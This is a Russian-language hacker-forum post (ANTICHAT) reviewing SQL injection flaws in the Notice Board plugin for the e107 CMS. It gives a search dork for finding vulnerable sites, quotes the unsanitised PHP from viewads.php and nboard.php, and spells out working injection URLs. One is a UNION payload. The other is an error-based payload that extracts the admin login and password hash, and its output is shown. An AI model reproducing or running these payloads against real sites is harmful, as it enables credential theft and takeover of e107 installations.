ANTICHAT - Показать сообщение отдельно - [ Обзор уязвимостей e107 cms ]

Не знаю было или не, но пишу:

скачал Plugins > E-Commerce > Notice Board на plugins.e107.org [скачать]

Author sunout

Date 13:10 14-May-10

дорк: inurl:e107_plugins/nboard

e107_plugins/nboard/viewads.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]require_once([/COLOR][COLOR="#DD0000"]"../../class2.php"[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#0000BB"]e_HANDLER[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"form_handler.php"[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#0000BB"]e_HANDLER[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"userclass_class.php"[/COLOR][COLOR="#007700"]);

@include_once([/COLOR][COLOR="#0000BB"]e_PLUGIN[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nboard/languages/"[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]e_LANGUAGE[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]".php"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$ns[/COLOR][COLOR="#007700"]= new[/COLOR][COLOR="#0000BB"]e107table[/COLOR][COLOR="#007700"];

require_once([/COLOR][COLOR="#0000BB"]HEADERF[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#DD0000"]"classmen.php"[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$uspage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]e_BASE[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'scat'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$act[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"act"[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#FF8000"]//==================================Debug=======================================

[/COLOR][COLOR="#007700"]if ([/COLOR][COLOR="#0000BB"]$act[/COLOR][COLOR="#007700"]==[/COLOR][COLOR="#DD0000"]"det"[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"nb_gnl"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"*"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]"gnl_id='[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#DD0000"]' "[/COLOR][COLOR="#007700"]);

    while([/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]db_Fetch[/COLOR][COLOR="#007700"]()){

[/COLOR][COLOR="#0000BB"]$gnl_id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_id'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_name[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_name'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_city[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_city'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_picbig[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_picbig'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_small[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_picsmall'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_detail[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_detail'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_user[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_user'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_phone[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_phone'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_email[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_email'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_date[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_date'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_price[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_price'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$gnl_kikoz[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$row[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'gnl_kikoz'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#FF8000"]/*...*/

////вывод где то там

[/COLOR][COLOR="#007700"]}

[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$caption[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]NB_NAME_6[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$ns[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]tablerender[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$caption[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$text[/COLOR][COLOR="#007700"]);

require_once([/COLOR][COLOR="#0000BB"]FOOTERF[/COLOR][COLOR="#007700"]);

[/COLOR][/COLOR]

екплоенг:

Код:

http://localhost/e107/e107_plugins/nboard/viewads.php?act=det&scat=1%27%20and%200%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13--+

условие mg=0ff

e107_plugins/nboard/nboard.php

PHP код:


		
			
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'cat'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'scat'[/COLOR][COLOR="#007700"]];

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]"page"[/COLOR][COLOR="#007700"]]

[/COLOR][COLOR="#FF8000"]/*...*/

//====================== all_select ============================//

[/COLOR][COLOR="#007700"]function[/COLOR][COLOR="#0000BB"]sql_cat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]){

[/COLOR][COLOR="#0000BB"]$begin[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// откуда начинать

[/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]"SELECT * FROM "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]" WHERE gnl_scatid in (select subcat_id from "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nb_subcat where subcat_catid=[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#DD0000"]) ORDER BY gnl_id DESC LIMIT "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$begin[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]", "[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"];

[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]mysql_query[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$sql[/COLOR][COLOR="#007700"]) or die([/COLOR][COLOR="#0000BB"]mysql_error[/COLOR][COLOR="#007700"]());

    return[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"];

echo[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"];

}

[/COLOR][COLOR="#FF8000"]/*...*/

[/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]40[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// записей на страницу

[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]MPREFIX[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]"nb_gnl"[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#FF8000"]// из какой таблицы

[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]page[/COLOR][COLOR="#007700"]();[/COLOR][COLOR="#FF8000"]// определяем страницу

[/COLOR][COLOR="#0000BB"]$result[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_result[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result_cat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_cat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#0000BB"]$result_scat[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]sql_scat[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$onpage[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$page[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$scat[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$table[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$gnl_pigbig[/COLOR][COLOR="#007700"]);

[/COLOR][COLOR="#FF8000"]/*...*/[/COLOR][/COLOR]

Теперь никаких условий должно быть, кстате там подзапрос, тоесть со скобкой вылазить надо.

Еще есть одна SQL inj в файле, но mg=off надо.

Запарилсо добиватца вывода и кнопать => Если нет значения в nb_cat, то уязвимость неексплуатируемая.

У кого есть желание смотрите.

короче через ошибку:

Код:

http://localhost/e107/e107_plugins/nboard/nboard.php?cat=1%29%20and%201=%28select%201%20from%20%28select%20count%28*%29%20from%20%28select%201%20union%20select%202%20union%20select%203%29x%20group%20by%20concat%28%28select%20%20concat_ws%280x3a,user_loginname,user_password%29%20from%20e107_user%20limit%200,1%29,0x3a,floor%28rand%280%29*2%29%29%29y%29--+

Цитата:

Сообщение от None

Duplicate entry 'admin:21232f297a57a5a743894a0e4a801fc3:1' for key 1